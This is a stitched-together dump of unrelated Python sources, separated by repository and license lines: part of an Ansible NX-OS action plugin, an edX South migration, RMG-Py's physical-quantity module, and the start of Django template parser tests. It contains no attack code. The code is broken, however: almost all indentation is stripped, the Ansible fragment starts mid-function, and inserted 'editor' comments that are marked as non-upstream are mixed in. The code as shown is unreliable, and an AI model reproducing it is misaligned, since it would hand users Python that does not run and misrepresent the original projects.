if (self._play_context.connection == 'httpapi' or self._task.args.get('provider', {}).get('transport') == 'nxapi') \
and self._task.action in ('nxos_file_copy', 'nxos_nxapi'):
return {'failed': True, 'msg': "Transport type 'nxapi' is not valid for '%s' module." % (self._task.action)}
if self._task.action == 'nxos_file_copy':
self._task.args['host'] = self._play_context.remote_addr
self._task.args['password'] = self._play_context.password
if self._play_context.connection == 'network_cli':
self._task.args['username'] = self._play_context.remote_user
elif self._play_context.connection == 'local':
self._task.args['username'] = self._play_context.connection_user
if self._task.action == 'nxos_install_os':
connection = self._connection
if connection.get_option('persistent_command_timeout') < 600 or connection.get_option('persistent_connect_timeout') < 600:
msg = 'PERSISTENT_COMMAND_TIMEOUT and PERSISTENT_CONNECT_TIMEOUT'
msg += ' must be set to 600 seconds or higher when using nxos_install_os module'
return {'failed': True, 'msg': msg}
if self._play_context.connection in ('network_cli', 'httpapi'):
provider = self._task.args.get('provider', {})
if any(provider.values()):
display.warning('provider is unnecessary when using %s and will be ignored' % self._play_context.connection)
del self._task.args['provider']
if self._task.args.get('transport'):
display.warning('transport is unnecessary when using %s and will be ignored' % self._play_context.connection)
del self._task.args['transport']
elif self._play_context.connection == 'local':
provider = load_provider(nxos_provider_spec, self._task.args)
transport = provider['transport'] or 'cli'
display.vvvv('connection transport is %s' % transport, self._play_context.remote_addr)
if transport == 'cli':
pc = copy.deepcopy(self._play_context)
pc.connection = 'network_cli'
pc.network_os = 'nxos'
pc.remote_addr = provider['host'] or self._play_context.remote_addr
pc.port = int(provider['port'] or self._play_context.port or 22)
pc.remote_user = provider['username'] or self._play_context.connection_user
pc.password = provider['password'] or self._play_context.password
pc.private_key_file = provider['ssh_keyfile'] or self._play_context.private_key_file
pc.become = provider['authorize'] or False
if pc.become:
pc.become_method = 'enable'
pc.become_pass = provider['auth_pass']
display.vvv('using connection plugin %s (was local)' % pc.connection, pc.remote_addr)
connection = self._shared_loader_obj.connection_loader.get('persistent', pc, sys.stdin)
command_timeout = int(provider['timeout']) if provider['timeout'] else connection.get_option('persistent_command_timeout')
connection.set_options(direct={'persistent_command_timeout': command_timeout})
socket_path = connection.run()
display.vvvv('socket_path: %s' % socket_path, pc.remote_addr)
if not socket_path:
return {'failed': True,
'msg': 'unable to open shell. Please see: ' +
'https://docs.ansible.com/ansible/network_debug_troubleshooting.html#unable-to-open-shell'}
task_vars['ansible_socket'] = socket_path
else:
self._task.args['provider'] = ActionModule.nxapi_implementation(provider, self._play_context)
else:
return {'failed': True, 'msg': 'Connection type %s is not valid for this module' % self._play_context.connection}
if (self._play_context.connection == 'local' and transport == 'cli') or self._play_context.connection == 'network_cli':
# make sure we are in the right cli context which should be
            # enable mode and not config mode
if socket_path is None:
socket_path = self._connection.socket_path
conn = Connection(socket_path)
# Match prompts ending in )# except those with (maint-mode)#
config_prompt = re.compile(r'^.*\((?!maint-mode).*\)#$')
out = conn.get_prompt()
while config_prompt.match(to_text(out, errors='surrogate_then_replace').strip()):
display.vvvv('wrong context, sending exit to device', self._play_context.remote_addr)
conn.send_command('exit')
out = conn.get_prompt()
result = super(ActionModule, self).run(task_vars=task_vars)
return result
@staticmethod
def nxapi_implementation(provider, play_context):
provider['transport'] = 'nxapi'
if provider.get('host') is None:
provider['host'] = play_context.remote_addr
if provider.get('port') is None:
if provider.get('use_ssl'):
provider['port'] = 443
else:
provider['port'] = 80
if provider.get('timeout') is None:
provider['timeout'] = C.PERSISTENT_COMMAND_TIMEOUT
if provider.get('username') is None:
provider['username'] = play_context.connection_user
if provider.get('password') is None:
provider['password'] = play_context.password
if provider.get('use_ssl') is None:
provider['use_ssl'] = False
if provider.get('validate_certs') is None:
provider['validate_certs'] = True
return provider
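# Editor's note (hedged illustration, not upstream Ansible code): for an empty
# provider dict and a play_context whose remote_addr is '192.0.2.1' with no
# password set, nxapi_implementation() above would fill in roughly:
#     {'transport': 'nxapi', 'host': '192.0.2.1', 'port': 80, 'use_ssl': False,
#      'validate_certs': True, 'timeout': C.PERSISTENT_COMMAND_TIMEOUT,
#      'username': <connection user>, 'password': None}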
| gpl-3.0 |
ubc/edx-platform | common/djangoapps/course_action_state/migrations/0002_add_rerun_display_name.py | 129 | 5409 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CourseRerunState.display_name'
db.add_column('course_action_state_coursererunstate', 'display_name',
self.gf('django.db.models.fields.CharField')(default='', max_length=255, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'CourseRerunState.display_name'
db.delete_column('course_action_state_coursererunstate', 'display_name')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'course_action_state.coursererunstate': {
'Meta': {'unique_together': "(('course_key', 'action'),)", 'object_name': 'CourseRerunState'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
'course_key': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_by_user+'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['auth.User']"}),
'display_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'should_display': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'source_course_key': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'updated_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'updated_by_user+'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['auth.User']"})
}
}
complete_apps = ['course_action_state']
| agpl-3.0 |
faribas/RMG-Py | rmgpy/quantity.py | 4 | 28300 | #!/usr/bin/env python
# encoding: utf-8
################################################################################
#
# RMG - Reaction Mechanism Generator
#
# Copyright (c) 2009-2011 by the RMG Team ([email protected])
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the 'Software'),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
"""
This module contains classes and methods for working with physical quantities,
particularly the :class:`Quantity` class for representing physical quantities.
"""
import numpy
import quantities as pq
import rmgpy.constants as constants
################################################################################
# Explicitly set the default units to SI
pq.set_default_units('si')
# These units are not defined by the quantities package, but occur frequently
# in data handled by RMG, so we define them manually
pq.UnitQuantity('kilocalories', pq.cal*1e3, symbol='kcal')
pq.UnitQuantity('kilojoules', pq.J*1e3, symbol='kJ')
pq.UnitQuantity('kilomoles', pq.mol*1e3, symbol='kmol')
pq.UnitQuantity('molecule', pq.mol/6.02214179e23, symbol='molecule')
pq.UnitQuantity('molecules', pq.mol/6.02214179e23, symbol='molecules')
pq.UnitQuantity('debye', 1.0/(constants.c*1e21)*pq.C*pq.m, symbol='De')
################################################################################
class QuantityError(Exception):
"""
An exception to be raised when an error occurs while working with physical
quantities in RMG. Pass a string describing the circumstances of the
exceptional behavior.
"""
pass
################################################################################
class Units(object):
"""
The :class:`Units` class provides a representation of the units of a
physical quantity. The attributes are:
=================== ========================================================
Attribute Description
=================== ========================================================
`units` A string representation of the units
=================== ========================================================
Functions that return the conversion factors to and from SI units are
provided.
"""
# A dict of conversion factors (to SI) for each of the frequent units
# Here we also define that cm^-1 is not to be converted to m^-1 (or Hz, J, K, etc.)
conversionFactors = {'cm^-1': 1.0}
def __init__(self, units=''):
self.units = units
def getConversionFactorToSI(self):
"""
Return the conversion factor for converting a quantity in a given set
        of `units` to the SI equivalent units.
"""
try:
# Process several common units manually for speed
factor = Units.conversionFactors[self.units]
except KeyError:
# Fall back to (slow!) quantities package for less common units
factor = float(pq.Quantity(1.0, self.units).simplified)
# Cache the conversion factor so we don't ever need to use
# quantities to compute it again
Units.conversionFactors[self.units] = factor
return factor
def getConversionFactorFromSI(self):
"""
Return the conversion factor for converting a quantity to a given set
of `units` from the SI equivalent units.
"""
return 1.0 / self.getConversionFactorToSI()
################################################################################
class ScalarQuantity(Units):
"""
The :class:`ScalarQuantity` class provides a representation of a scalar
physical quantity, with optional units and uncertainty information. The
attributes are:
=================== ========================================================
Attribute Description
=================== ========================================================
`value` The numeric value of the quantity in the given units
`units` The units the value was specified in
`uncertainty` The numeric uncertainty in the value
`uncertaintyType` The type of uncertainty: ``'+|-'`` for additive, ``'*|/'`` for multiplicative
`value_si` The numeric value of the quantity in the corresponding SI units
=================== ========================================================
It is often more convenient to perform computations using SI units instead
of the given units of the quantity. For this reason, the SI equivalent of
the `value` attribute can be directly accessed using the `value_si`
attribute. This value is cached on the :class:`ScalarQuantity` object for
speed.
"""
def __init__(self, value, units='', uncertainty=None, uncertaintyType='+|-'):
Units.__init__(self, units)
self.value = value
self.uncertaintyType = uncertaintyType
self.uncertainty = float(uncertainty) if uncertainty is not None else 0.0
def __reduce__(self):
"""
Return a tuple of information used to pickle the scalar quantity.
"""
return (ScalarQuantity, (self.value, self.units, self.uncertainty, self.uncertaintyType))
def __str__(self):
"""
Return a string representation of the scalar quantity.
"""
result = '{0:g}'.format(self.value)
if self.uncertainty != 0.0:
result += ' {0} {1:g}'.format(self.uncertaintyType, self.uncertainty)
if self.units != '':
result += ' {0}'.format(self.units)
return result
def __repr__(self):
"""
Return a string representation that can be used to reconstruct the
scalar quantity.
"""
if self.units == '' and self.uncertainty == 0.0:
return '{0:g}'.format(self.value)
else:
result = '({0:g},{1!r}'.format(self.value, self.units)
if self.uncertainty != 0.0:
result += ',{0!r},{1:g}'.format(self.uncertaintyType, self.uncertainty)
result += ')'
return result
def copy(self):
"""
Return a copy of the quantity.
"""
return ScalarQuantity(self.value, self.units, self.uncertainty, self.uncertaintyType)
def getValue(self):
"""
The numeric value of the quantity, in the given units
"""
return self.value_si * self.getConversionFactorFromSI()
def setValue(self, v):
self.value_si = float(v) * self.getConversionFactorToSI()
value = property(getValue, setValue)
def getUncertainty(self):
"""
The numeric value of the uncertainty, in the given units if additive, or no units if multiplicative.
"""
if self.isUncertaintyAdditive():
return self.uncertainty_si * self.getConversionFactorFromSI()
else:
return self.uncertainty_si
def setUncertainty(self, v):
if self.isUncertaintyAdditive():
self.uncertainty_si = float(v) * self.getConversionFactorToSI()
else:
self.uncertainty_si = float(v)
uncertainty = property(getUncertainty, setUncertainty)
def getUncertaintyType(self):
"""
The type of uncertainty: ``'+|-'`` for additive, ``'*|/'`` for multiplicative
"""
return self._uncertaintyType
def setUncertaintyType(self, v):
"""
Check the uncertainty type is valid, then set it, and set the uncertainty to -1.
If you set the uncertainty then change the type, we have no idea what to do with
the units. This ensures you set the type first.
"""
if v not in ['+|-','*|/']:
raise QuantityError("Invalid uncertainty type")
self._uncertaintyType = v
self.uncertainty_si = -1
uncertaintyType = property(getUncertaintyType, setUncertaintyType)
def equals(self, quantity):
"""
        Return ``True`` if everything in a quantity object matches
the parameters in this object. If there are lists of values or uncertainties,
each item in the list must be matching and in the same order.
Otherwise, return ``False``
(Originally intended to return warning if units capitalization was
different, however, Quantity object only parses units matching in case, so
this will not be a problem.)
"""
def approx_equal(x, y, atol = .01):
"""
Returns true if two float/double values are approximately equal
within a relative error of 1% or under a user specific absolute tolerance.
"""
return abs(x-y) <= 1e-2*abs(x) or abs(x-y) <= 1e-2*abs(y) or abs(x-y) <= atol
if isinstance(quantity, ScalarQuantity):
if (self.uncertaintyType == quantity.uncertaintyType and
approx_equal(self.uncertainty * self.getConversionFactorToSI(), quantity.uncertainty * quantity.getConversionFactorToSI()) and
self.units == quantity.units):
if self.units == "kcal/mol":
# set absolute tolerance to .01 kcal/mol = 42 J/mol
atol = 42
else:
# for other units, set it to .01
atol = .01
if not approx_equal(self.value_si, quantity.value_si, atol):
return False
return True
return False
def isUncertaintyAdditive(self):
"""
Return ``True`` if the uncertainty is specified in additive format
and ``False`` otherwise.
"""
return self._uncertaintyType == '+|-'
def isUncertaintyMultiplicative(self):
"""
Return ``True`` if the uncertainty is specified in multiplicative
format and ``False`` otherwise.
"""
return self._uncertaintyType == '*|/'
################################################################################
class ArrayQuantity(Units):
"""
    The :class:`ArrayQuantity` class provides a representation of an array of
physical quantity values, with optional units and uncertainty information.
The attributes are:
=================== ========================================================
Attribute Description
=================== ========================================================
`value` The numeric value of the quantity in the given units
`units` The units the value was specified in
`uncertainty` The numeric uncertainty in the value
`uncertaintyType` The type of uncertainty: ``'+|-'`` for additive, ``'*|/'`` for multiplicative
`value_si` The numeric value of the quantity in the corresponding SI units
=================== ========================================================
It is often more convenient to perform computations using SI units instead
of the given units of the quantity. For this reason, the SI equivalent of
the `value` attribute can be directly accessed using the `value_si`
attribute. This value is cached on the :class:`ArrayQuantity` object for
speed.
"""
def __init__(self, value, units='', uncertainty=None, uncertaintyType='+|-'):
Units.__init__(self, units)
self.value = value
self.uncertaintyType = uncertaintyType
if uncertainty is None:
self.uncertainty = numpy.zeros_like(self.value)
elif isinstance(uncertainty, (int,float)):
self.uncertainty = numpy.ones_like(self.value) * uncertainty
else:
uncertainty = numpy.array(uncertainty)
if uncertainty.ndim != self.value.ndim:
raise QuantityError('The given uncertainty has {0:d} dimensions, while the given value has {1:d} dimensions.'.format(uncertainty.ndim, self.value.ndim))
for i in range(self.value.ndim):
if self.value.shape[i] != uncertainty.shape[i]:
raise QuantityError('Dimension {0:d} has {1:d} elements for the given value, but {2:d} elements for the given uncertainty.'.format(i, self.value.shape[i], uncertainty.shape[i]))
else:
self.uncertainty = uncertainty
def __reduce__(self):
"""
Return a tuple of information used to pickle the array quantity.
"""
return (ArrayQuantity, (self.value, self.units, self.uncertainty, self.uncertaintyType))
def __str__(self):
"""
Return a string representation of the array quantity.
"""
if self.value.ndim == 1:
value = '[{0}]'.format(','.join(['{0:g}'.format(float(v)) for v in self.value]))
elif self.value.ndim == 2:
value = []
for i in range(self.value.shape[0]):
value.append('[{0}]'.format(','.join(['{0:g}'.format(float(self.value[i,j])) for j in range(self.value.shape[1])])))
value = '[{0}]'.format(','.join(value))
if self.uncertainty.ndim == 1:
uncertainty = '[{0}]'.format(','.join(['{0:g}'.format(float(v)) for v in self.uncertainty]))
elif self.uncertainty.ndim == 2:
uncertainty = []
for i in range(self.uncertainty.shape[0]):
uncertainty.append('[{0}]'.format(','.join(['{0:g}'.format(float(self.uncertainty[i,j])) for j in range(self.uncertainty.shape[1])])))
uncertainty = '[{0}]'.format(','.join(uncertainty))
result = '{0}'.format(value)
if any(self.uncertainty != 0.0):
result += ' {0} {1}'.format(self.uncertaintyType, uncertainty)
if self.units != '':
result += ' {0}'.format(self.units)
return result
def __repr__(self):
"""
Return a string representation that can be used to reconstruct the
array quantity.
"""
if self.value.ndim == 1:
value = '[{0}]'.format(','.join(['{0:g}'.format(float(v)) for v in self.value]))
elif self.value.ndim == 2:
value = []
for i in range(self.value.shape[0]):
value.append('[{0}]'.format(','.join(['{0:g}'.format(float(self.value[i,j])) for j in range(self.value.shape[1])])))
value = '[{0}]'.format(','.join(value))
if self.uncertainty.ndim == 1:
uncertainty = '[{0}]'.format(','.join(['{0:g}'.format(float(v)) for v in self.uncertainty]))
elif self.uncertainty.ndim == 2:
uncertainty = []
for i in range(self.uncertainty.shape[0]):
uncertainty.append('[{0}]'.format(','.join(['{0:g}'.format(float(self.uncertainty[i,j])) for j in range(self.uncertainty.shape[1])])))
uncertainty = '[{0}]'.format(','.join(uncertainty))
if self.units == '' and not numpy.any(self.uncertainty != 0.0):
return '{0}'.format(value)
else:
result = '({0},{1!r}'.format(value, self.units)
if numpy.any(self.uncertainty != 0.0):
result += ',{0!r},{1}'.format(self.uncertaintyType, uncertainty)
result += ')'
return result
def copy(self):
"""
Return a copy of the quantity.
"""
return ArrayQuantity(self.value.copy(), self.units, self.uncertainty.copy(), self.uncertaintyType)
def getValue(self):
return self.value_si * self.getConversionFactorFromSI()
def setValue(self, v):
self.value_si = numpy.array(v) * self.getConversionFactorToSI()
value = property(getValue, setValue)
def equals(self, quantity):
"""
        Return ``True`` if everything in a quantity object matches
the parameters in this object. If there are lists of values or uncertainties,
each item in the list must be matching and in the same order.
Otherwise, return ``False``
(Originally intended to return warning if units capitalization was
different, however, Quantity object only parses units matching in case, so
this will not be a problem.)
"""
def approx_equal(x, y, atol = .01):
"""
Returns true if two float/double values are approximately equal
within a relative error of 1% or under a user specific absolute tolerance.
"""
return abs(x-y) <= 1e-2*abs(x) or abs(x-y) <= 1e-2*abs(y) or abs(x-y) <= atol
if isinstance(quantity, ArrayQuantity):
if (self.uncertaintyType == quantity.uncertaintyType and self.units == quantity.units):
if self.units == "kcal/mol":
# set absolute tolerance to .01 kcal/mol = 42 J/mol
atol = 42
else:
# for other units, set it to .01
atol = .01
if self.value.ndim != quantity.value.ndim:
return False
for i in range(self.value.ndim):
if self.value.shape[i] != quantity.value.shape[i]:
return False
for v1, v2 in zip(self.value.flat, quantity.value.flat):
if not approx_equal(v1, v2, atol):
return False
if self.uncertainty.ndim != quantity.uncertainty.ndim:
return False
for i in range(self.uncertainty.ndim):
if self.uncertainty.shape[i] != quantity.uncertainty.shape[i]:
return False
for v1, v2 in zip(self.uncertainty.flat, quantity.uncertainty.flat):
if not approx_equal(v1, v2, atol):
return False
return True
return False
def isUncertaintyAdditive(self):
"""
Return ``True`` if the uncertainty is specified in additive format
and ``False`` otherwise.
"""
return self.uncertaintyType == '+|-'
def isUncertaintyMultiplicative(self):
"""
Return ``True`` if the uncertainty is specified in multiplicative
format and ``False`` otherwise.
"""
return self.uncertaintyType == '*|/'
################################################################################
def Quantity(*args, **kwargs):
"""
Create a :class:`ScalarQuantity` or :class:`ArrayQuantity` object for a
given physical quantity. The physical quantity can be specified in several
ways:
* A scalar-like or array-like value (for a dimensionless quantity)
* An array of arguments (including keyword arguments) giving some or all of
the `value`, `units`, `uncertainty`, and/or `uncertaintyType`.
* A tuple of the form ``(value,)``, ``(value,units)``,
``(value,units,uncertainty)``, or
``(value,units,uncertaintyType,uncertainty)``
* An existing :class:`ScalarQuantity` or :class:`ArrayQuantity` object, for
which a copy is made
"""
# Initialize attributes
value = None
units = ''
uncertaintyType = '+|-'
uncertainty = None
if len(args) == 1 and len(kwargs) == 0 and args[0] is None:
return None
# Unpack args if necessary
if isinstance(args, tuple) and len(args) == 1 and isinstance(args[0], tuple):
args = args[0]
# Process args
Nargs = len(args)
if Nargs == 1 and isinstance(args[0], (ScalarQuantity,ArrayQuantity)):
# We were given another quantity object, so make a (shallow) copy of it
other = args[0]
value = other.value
units = other.units
uncertaintyType = other.uncertaintyType
uncertainty = other.uncertainty
elif Nargs == 1:
# If one parameter is given, it should be a single value
value, = args
elif Nargs == 2:
# If two parameters are given, it should be a value and units
value, units = args
elif Nargs == 3:
# If three parameters are given, it should be a value, units and uncertainty
value, units, uncertainty = args
elif Nargs == 4:
# If four parameters are given, it should be a value, units, uncertainty type, and uncertainty
value, units, uncertaintyType, uncertainty = args
elif Nargs != 0:
        raise QuantityError('Invalid parameters {0!r} passed to Quantity().'.format(args))
# Process kwargs
for k, v in kwargs.items():
if k == 'value':
if len(args) >= 1:
                raise QuantityError('Multiple values for argument {0} passed to Quantity().'.format(k))
else:
value = v
elif k == 'units':
if len(args) >= 2:
                raise QuantityError('Multiple values for argument {0} passed to Quantity().'.format(k))
else:
units = v
elif k == 'uncertainty':
if len(args) >= 3:
                raise QuantityError('Multiple values for argument {0} passed to Quantity().'.format(k))
else:
uncertainty = v
elif k == 'uncertaintyType':
if len(args) >= 4:
                raise QuantityError('Multiple values for argument {0} passed to Quantity().'.format(k))
else:
uncertaintyType = v
else:
            raise QuantityError('Invalid keyword argument {0} passed to Quantity().'.format(k))
# Process units and uncertainty type parameters
if uncertaintyType not in ['+|-', '*|/']:
raise QuantityError('Unexpected uncertainty type "{0}"; valid values are "+|-" and "*|/".'.format(uncertaintyType))
if isinstance(value, (list,tuple,numpy.ndarray)):
return ArrayQuantity(value, units, uncertainty, uncertaintyType)
try:
value = float(value)
except TypeError:
return ArrayQuantity(value, units, uncertainty, uncertaintyType)
uncertainty = 0.0 if uncertainty is None else float(uncertainty)
return ScalarQuantity(value, units, uncertainty, uncertaintyType)
################################################################################
class UnitType:
"""
The :class:`UnitType` class represents a factory for producing
:class:`ScalarQuantity` or :class:`ArrayQuantity` objects of a given unit
type, e.g. time, volume, etc.
"""
def __init__(self, units, commonUnits=None, extraDimensionality=None):
self.units = units
self.dimensionality = pq.Quantity(1.0, units).simplified.dimensionality
self.commonUnits = commonUnits or []
self.extraDimensionality = {}
if extraDimensionality:
for unit, factor in extraDimensionality.items():
self.extraDimensionality[pq.Quantity(1.0, unit).simplified.dimensionality] = factor
def __call__(self, *args, **kwargs):
# Make a ScalarQuantity or ArrayQuantity object out of the given parameter
quantity = Quantity(*args, **kwargs)
if quantity is None:
return quantity
units = quantity.units
# If the units are in the common units, then we can do the conversion
# very quickly and avoid the slow calls to the quantities package
if units == self.units or units in self.commonUnits:
return quantity
# Check that the units are consistent with this unit type
# This uses the quantities package (slow!)
units = pq.Quantity(1.0, units)
dimensionality = units.simplified.dimensionality
if dimensionality == self.dimensionality:
pass
elif dimensionality in self.extraDimensionality:
quantity.value_si *= self.extraDimensionality[dimensionality]
quantity.units = self.units
else:
raise QuantityError('Invalid units {0!r}.'.format(quantity.units))
        # Return the ScalarQuantity or ArrayQuantity object
return quantity
Acceleration = UnitType('m/s^2')
Area = UnitType('m^2')
Concentration = UnitType('mol/m^3')
Dimensionless = UnitType('')
DipoleMoment = UnitType('C*m', extraDimensionality={
'De': 1.0 / (1.0e21 * constants.c),
})
Energy = Enthalpy = FreeEnergy = UnitType('J/mol', commonUnits=['kJ/mol', 'cal/mol', 'kcal/mol'])
Entropy = HeatCapacity = UnitType('J/(mol*K)', commonUnits=['kJ/(mol*K)', 'cal/(mol*K)', 'kcal/(mol*K)'])
Flux = UnitType('mol/(m^2*s)')
Frequency = UnitType('cm^-1', extraDimensionality={
's^-1': 1.0 / (constants.c * 100.),
'Hz': 1.0 / (constants.c * 100.),
'J': 1.0 / (constants.h * constants.c * 100.),
'K': constants.kB / (constants.h * constants.c * 100.),
})
Force = UnitType('N')
Inertia = UnitType('kg*m^2')
Length = UnitType('m')
Mass = UnitType('amu', extraDimensionality={'kg/mol': 1000.*constants.amu})
Momentum = UnitType('kg*m/s^2')
Power = UnitType('W')
Pressure = UnitType('Pa', commonUnits=['bar', 'atm', 'torr', 'psi', 'mbar'])
Temperature = UnitType('K', commonUnits=['degC', 'degF', 'degR'])
Time = UnitType('s')
Velocity = UnitType('m/s')
Volume = UnitType('m^3')
# Polarizability = UnitType('C*m^2*V^-1')
"""
What's called Polarizability in the transport properties is in fact a polarizability volume,
which is related by $4*\pi*\epsilon_0$ where $\epsilon_0$ is the permittivity of free space.
Rather than mess around with conversions, I suggest we just use "Volume" as the units for
what we call 'polarizability'. Chemkin expects it in Angstrom^3. We'll store it in m^3.
"""
# RateCoefficient is handled as a special case since it can take various
# units depending on the reaction order
RATECOEFFICIENT_CONVERSION_FACTORS = {
(1.0/pq.s).dimensionality: 1.0,
(pq.m**3/pq.s).dimensionality: 1.0,
(pq.m**6/pq.s).dimensionality: 1.0,
(pq.m**9/pq.s).dimensionality: 1.0,
(pq.m**3/(pq.mol*pq.s)).dimensionality: 1.0,
(pq.m**6/(pq.mol**2*pq.s)).dimensionality: 1.0,
(pq.m**9/(pq.mol**3*pq.s)).dimensionality: 1.0,
}
RATECOEFFICIENT_COMMON_UNITS = ['s^-1', 'm^3/(mol*s)', 'cm^3/(mol*s)', 'm^3/(molecule*s)', 'cm^3/(molecule*s)']
def RateCoefficient(*args, **kwargs):
# Make a ScalarQuantity or ArrayQuantity object out of the given parameter
quantity = Quantity(*args, **kwargs)
if quantity is None:
return quantity
units = quantity.units
# If the units are in the common units, then we can do the conversion
# very quickly and avoid the slow calls to the quantities package
if units in RATECOEFFICIENT_COMMON_UNITS:
return quantity
dimensionality = pq.Quantity(1.0, quantity.units).simplified.dimensionality
try:
factor = RATECOEFFICIENT_CONVERSION_FACTORS[dimensionality]
quantity.value_si *= factor
except KeyError:
raise QuantityError('Invalid units {0!r}.'.format(quantity.units))
    # Return the ScalarQuantity or ArrayQuantity object
return quantity
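# ---------------------------------------------------------------------------
# Editor's sketch (not part of upstream RMG-Py): a few of the equivalent
# construction forms accepted by the Quantity() factory and the
# RateCoefficient() helper, assuming the unit conversions behave as
# documented above.
if __name__ == '__main__':
    E = Quantity(10.0, 'kcal/mol')              # ScalarQuantity
    print(E)                                    # '10 kcal/mol'
    print(E.value_si)                           # ~41840.0 (J/mol)
    T = Quantity([300.0, 400.0, 500.0], 'K')    # ArrayQuantity of temperatures
    print(T)
    k = RateCoefficient(1.0e13, 's^-1')         # units depend on reaction order
    print(k)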
| mit |
SnappleCap/oh-mainline | vendor/packages/Django/tests/regressiontests/templates/parser.py | 58 | 3218 | """
Testing some internals of the template processing. These are *not* examples to be copied in user code.
"""
from __future__ import unicode_literals
from django.template import (TokenParser, FilterExpression, Parser, Variable,
TemplateSyntaxError)
from django.utils.unittest import TestCase
class ParserTests(TestCase):
def test_token_parsing(self):
# Tests for TokenParser behavior in the face of quoted strings with
# spaces.
p = TokenParser("tag thevar|filter sometag")
self.assertEqual(p.tagname, "tag")
self.assertEqual(p.value(), "thevar|filter")
self.assertTrue(p.more())
self.assertEqual(p.tag(), "sometag")
self.assertFalse(p.more())
p = TokenParser('tag "a value"|filter sometag')
self.assertEqual(p.tagname, "tag")
self.assertEqual(p.value(), '"a value"|filter')
self.assertTrue(p.more())
self.assertEqual(p.tag(), "sometag")
self.assertFalse(p.more())
p = TokenParser("tag 'a value'|filter sometag")
self.assertEqual(p.tagname, "tag")
self.assertEqual(p.value(), "'a value'|filter")
self.assertTrue(p.more())
self.assertEqual(p.tag(), "sometag")
self.assertFalse(p.more())
def test_filter_parsing(self):
c = {"article": {"section": "News"}}
p = Parser("")
def fe_test(s, val):
self.assertEqual(FilterExpression(s, p).resolve(c), val)
fe_test("article.section", "News")
fe_test("article.section|upper", "NEWS")
fe_test('"News"', "News")
fe_test("'News'", "News")
fe_test(r'"Some \"Good\" News"', 'Some "Good" News')
fe_test(r'"Some \"Good\" News"', 'Some "Good" News')
